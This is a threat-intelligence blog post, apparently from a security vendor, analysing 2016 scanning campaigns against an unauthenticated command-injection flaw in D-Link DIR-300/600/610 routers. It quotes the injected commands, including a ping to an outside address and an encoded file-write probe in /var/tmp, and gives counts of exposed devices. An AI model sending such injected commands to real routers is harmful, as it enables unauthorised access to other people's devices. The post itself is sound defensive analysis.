In early 2013, a vulnerability with various D-Link home routers was disclosed which detailed the ability to exploit the DIR-300 and DIR-600 models. As concluded in the original disclosure from Michael Messner, the vulnerability can provide an attacker remote code execution capability due to access control and input validation weaknesses. While the vulnerability is a few years old, it's completely possible, and even likely, many owners of these home routers have not yet upgraded their firmware or replaced the entire device.
Over the recent weeks, ProtectWise has been observing multiple large automated web scanning campaigns from an unknown source in attempt to utilize this vulnerability.
The first interesting campaign occurred from June 27th through June 29th 2016. From reviewing the individual exploit attempts, the potential goal of the scan was to simply search and log routers across the web which successfully performed remote execution. There were multiple versions identified, below were the most widespread ones:
In the exploit attempt displayed above, the attacker is simply performing an HTTP POST request to the vulnerable routers command page without any authentication. The attempted command is the URL encoded string following the "cmd=" within the body, which does a single quiet ping with the size set as 321 to the IP address 126.96.36.199.
In this example, the full decoded command is:
cmd=ping -q -c 1 -s 321 188.8.131.52
Towards the end of this first campaign, the attacker then began to modify the command to:
In this version, the various options were now removed from the ping command, leaving us with:
More recently, occurring from July 5th to July 7th 2016, we identified another interesting campaign following similar tactics.
As shown in the image above, this version continues in attempting to exploit the same vulnerability, however the goal appears to be the same as the first one while the process is different.
cmd=%63%64%20%2F%76%61%72%2F%74% 6D%70%20%26%26%20%65%63%68%6F%20% 2D%6E%65%20%5C%5C%78%33%36%31%30% 63%6B%65%72%20%3E%20%36%31%30%63% 6B%65%72%2E%74%78%74%20%26%26%20% 63%61%74%20%36%31%30%63%6B%65%72% 2E%74%78%74
This command then decodes into:
cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt
First, the command changes to the /var/tmp directory. Then it echos 610cker into a new file called 610cker.txt. The -ne options simply mean to not output a trailing newline, and enable backslash escape sequence byte with x3 hexadecimal values. Lastly, it runs the cat command on the newly created file, which replies with the contents of the file (if successful). This command appears to be a different method to achieving the same goal as the first version seen in late June, which is to potentially map out vulnerable routers accessible through the internet.
Looking at this new command, we gain a slight idea for what the source of these exploit attempts are seeking. Based on the file name and inserted string (610cker), we can hypothesize that they are seeking out and attempting to exploit the D-Link DIR-610 router. The DIR-610 is a home router, which is similar to the DIR-600, but sold in Latin America.
It is unclear if this vulnerability is new to the DIR-610, or if the attack is attempting to identify still vulnerable D-Link routers, such as the DIR-600 and DIR-300 firmware versions mentioned in disclosure linked above. With the use of Shodan, the following quantity of D-Link routers are publicly accessible over the web as of this blog post:
DIR-300 All Ver. -- 567 DIR-300 Ver 2.12 -- 56 DIR-300 Ver 2.13 -- 0 DIR-600 All Ver. -- 10,487 DIR-600 Ver 2.12 -- 1,420 DIR-600 Ver 2.13 -- 39 DIR-600 Ver 2.14 -- 3 DIR-610 All Ver. -- 5,557 DIR-610 Ver 1.00 -- 2,235 DIR-610 Ver 1.01 -- 3,110
It's worth noting that the source of these scans may not have malicious intentions, such as someone with academic or security research goals. However, key traits of the activity indicates that this might not be the case. For example, the above execution attempts originated from thousands of proxy IPs, on a global basis, potentially pointing to an attacker trying to prevent attribution and simple IP blacklisting. Lastly, there was very little indication that a the source IP of the attacks (potential proxy) were used against multiple targets.
We'll continue to track these patterns and update this blog post with any updates.